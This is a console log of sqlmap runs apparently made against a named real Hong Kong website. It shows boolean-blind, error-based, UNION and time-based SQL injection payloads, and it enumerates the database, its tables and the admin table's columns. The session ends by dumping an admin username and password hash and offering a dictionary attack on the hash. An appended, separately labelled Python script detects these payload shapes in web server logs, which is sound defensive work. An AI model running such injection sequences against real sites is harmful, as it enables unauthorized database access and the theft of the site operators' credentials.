D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names in the current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of those columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
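Added here as a defender's companion to the session above, not part of the original post: every run leaves the same payload shapes in the target's web server access log (AND n=n, SLEEP(n), UNION ALL SELECT NULL, the CHAR(58,...) ':' delimiters, FLOOR(RAND(0)*2) against information_schema), and they are easy to match once the query string is URL-decoded. The log lines, client addresses, date and sizes are constructed; the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures lifted from the payload shapes in the sqlmap output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\(RAND\(0\)\*2\)|information_schema", re.I),
    "union-probe": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "time-blind": re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I),
    "char-marker": re.compile(r"CHAR\(\s*58\s*,", re.I),  # ':' delimiters sqlmap wraps results in
}

# Apache common log format: client ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (client, kinds): kinds is the sorted list of signature names hit by this line."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    client, _ts, _method, path, _status = m.groups()
    decoded = unquote_plus(path)  # match the decoded query, not the raw %-encoded text
    kinds = sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))
    return client, kinds

def summarize(lines):
    """Aggregate hits per client address: {client: {signature: count}}."""
    report = {}
    for line in lines:
        client, kinds = classify(line)
        if client is None or not kinds:
            continue
        per_client = report.setdefault(client, {})
        for k in kinds:
            per_client[k] = per_client.get(k, 0) + 1
    return report

# Constructed sample log (addresses, date and sizes are made up); payloads mirror the ones above.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2011:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%28CHAR%2858%2C99%29%29%23 HTTP/1.1" 200 310',
    '198.51.100.2 - - [01/Jan/2011:16:54:00 +0800] "GET /article.php?id=277 HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for client, hits in summarize(SAMPLE_LOG).items():
        print(client, hits)
```

A single client tripping several distinct signature kinds within a few seconds is the pattern to alert on; one boolean hit alone is often a false positive from an ordinary query string.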